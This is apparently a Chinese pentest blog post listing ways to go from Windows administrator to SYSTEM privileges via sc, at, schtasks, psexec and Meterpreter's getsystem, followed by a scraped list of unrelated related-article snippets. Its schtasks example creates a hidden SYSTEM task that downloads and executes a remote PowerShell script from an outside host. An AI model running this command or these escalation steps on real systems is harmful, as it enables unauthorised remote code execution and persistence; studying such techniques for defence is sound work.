从administrator到system权限的几种方式
文章目录
- 前言
- 1. 通过sc命令(只适用于win xp)
- 2. 通过计划任务命令(win7-win10)
- 2.1 通过at命令实现(只适用于win7)
- 2.2 通过schtasks实现(win7-win10)
- 3. 通过psexec
- 4. Meterpreter
- 参考文章
前言
对windows中从admin到system权限到方法做一个小的记录。主要参考了三好学生的博客,三好学生博客地址。
以下利用方式的前提是已经获取了计算机的administrator权限。
1. 通过sc命令(只适用于win xp)
以system权限启动notepad
sc Create badcode binPath= "cmd /c notepad.exe" type= own type= interact
sc start badcode
2. 通过计划任务命令(win7-win10)
计划任务有两种命令,at与schtasks。
2.1 通过at命令实现(只适用于win7)
以system权限在早晨7.50分启动notepad
at 7:50 notepad.exe
2.2 通过schtasks实现(win7-win10)
以system权限在每天早晨7.50分启动notepad
schtasks /Create /TN badcode /SC DAILY /ST 07:50 /TR "powershell.exe -nop -w hidden -c \"IEX ((new-object net.webclient).downloadstring(\\\"http://172.16.250.3:802/a\\\"))\"" /RU SYSTEM
schtasks /run /tn badcode
schtasks /Query /TN badcode
schtasks /Delete /TN badcode /F
3. 通过psexec
#隐藏打开的notepad的窗口。
psexec.exe -accepteula -s -d notepad.exe
#以交互式的形式打开notepad
psexec.exe -accepteula -s -i notepad.exe
4. Meterpreter
获得administrator权限后直接使用getsystem命令即可获得system权限。
简单点说实现的原理是windows中倘若程序A创建了一个服务并提供了命名管道,然后system权限的服务B在链接此命名管道的时候程序A就能利用ImpersonateNamedPipeClient()
函数来获得system权限。
详细的细节可以参考:
getsystem命令原理
参考文章
三好学生博客地址
玩转计划任务
Windows-schtasks命令中的单引号
getsystem命令原理
从administrator到system权限的几种方式相关推荐
- linux两种方式改变文件权限,Linux更改文件权限的两种方式
今天小编要跟大家分享一篇关于Linux更改文件权限的方式,喜欢Linux的小伙伴来看一看吧. 我们知道·Linux系统最主要的特点之一就是--Linux系统是多用户.多任务的操作系统. 何为多用户?就 ...
- server2008 sql 账号只读权限_SQL Server 2008数据库创建用户只读权限的两种方式(转载)...
最优秀的解决方案: https://www.cnblogs.com/hao-1234-1234/p/12699185.html 其它相关文章: 一.命令行方式创建 新建查询窗口,然后输入以下命令然后执 ...
- 管理员身份获得 SYSTEM 权限的四种方法
本文总结了 4 种方法获得 SYSTEM 权限来运行 regedit.exe 文件, 源代码很容易修改成命令行方式运行指定的程序. 1. 以服务方式运行 2. 添加 ACL 的方法 3. HOOK Z ...
- linux中赋予普通用户root权限的三种方式
前言 在成功拿下一个服务器并提权成为root用户以后,为了减少root用户使用时间从而减少被网站管理员发现的概率,就需要新建一个普通用户,并赋予其完全的管理员权限,有以下三种常见的方式 三种方式 1. ...
- Android 获得 usb 权限的两种方式
0. 前言 在做 USB OTG 通信时,第一步就是要能够获取到 usb 的使用权限,因此特地在此处介绍一下两种我用过的获取 usb 权限方式. 1. 直接在 AndroidManifest.xml ...
- java enum判断_Java Enum枚举 遍历判断 四种方式(包括 Lambda 表达式过滤)
packagecom.miracle.luna.lambda;importjava.util.Arrays;/*** @Author Miracle Luna * @Date 2019/6/9 23: ...
- winform list集合怎么 in过滤_Java List集合遍历数据的八种方式
准备工作:使用静态块初始化List数据 private static List list;//静态块 ==> 初始化ArrayListstatic { list = new ArrayList& ...
- 未经处理的异常:System.Net.Sockets.SocketException: 以一种访问权限不允许的方式做了一个访问套接字的尝试...
报错:未经处理的异常:System.Net.Sockets.SocketException: 以一种访问权限不允许的方式做了一个访问套接字的尝试 → 尝试以"管理员身份"运行程序, ...
- 获取比Administrator还高的权限——SYSTEM权限
获取比Administrator还高的权限--SYSTEM权限 设置PsTool环境 常用命令 以系统权限打开cmd 以系统权限打开explorer(其实也是桌面) 首先,我们会用到PsTool中的P ...
最新文章
- 配置VMware ESXi 5事件发送到SYSLOG服务器
- 云+技术沙龙:计算机视觉的原理及最佳实践
- 线程池之SingleThreadPool学习
- java如何让控制台不输出报错_Java 控制台输入输出操作记录
- redis学习(四) 登录和cookie缓存
- java 虚引用 作用_Java的强引用、弱引用、软引用和虚引用,以及用途
- P4849 寻找宝藏(模板:四维偏序)
- 学习笔记9-C语言-传参、类型限定符、递归
- Essential Grouping高性能的数据分组引擎介绍及下载
- 蚂蚁集团上市造富:员工激励达1376.9亿元,人均超800万!
- 10-2-DBUtils工具
- 关于Synchornized,Lock,AtomicBoolean和volatile的区别介绍
- Data Guard 三种模式解释
- Fiddler-弱网测试设置
- 方框加对勾怎么输入_对号“√”怎么输入到方框“□”-空格对号
- JavaSE(9)-细节狂魔:OOP之继承多态?20K字长篇看完,有手就行
- 英雄联盟胜负预测--简易肯德基上校
- 增量式编码器c语言,增量式编码器
- 小程序源码:uni-app云开发的网盘助手-多玩法安装简单
- 五指山(nefu 84)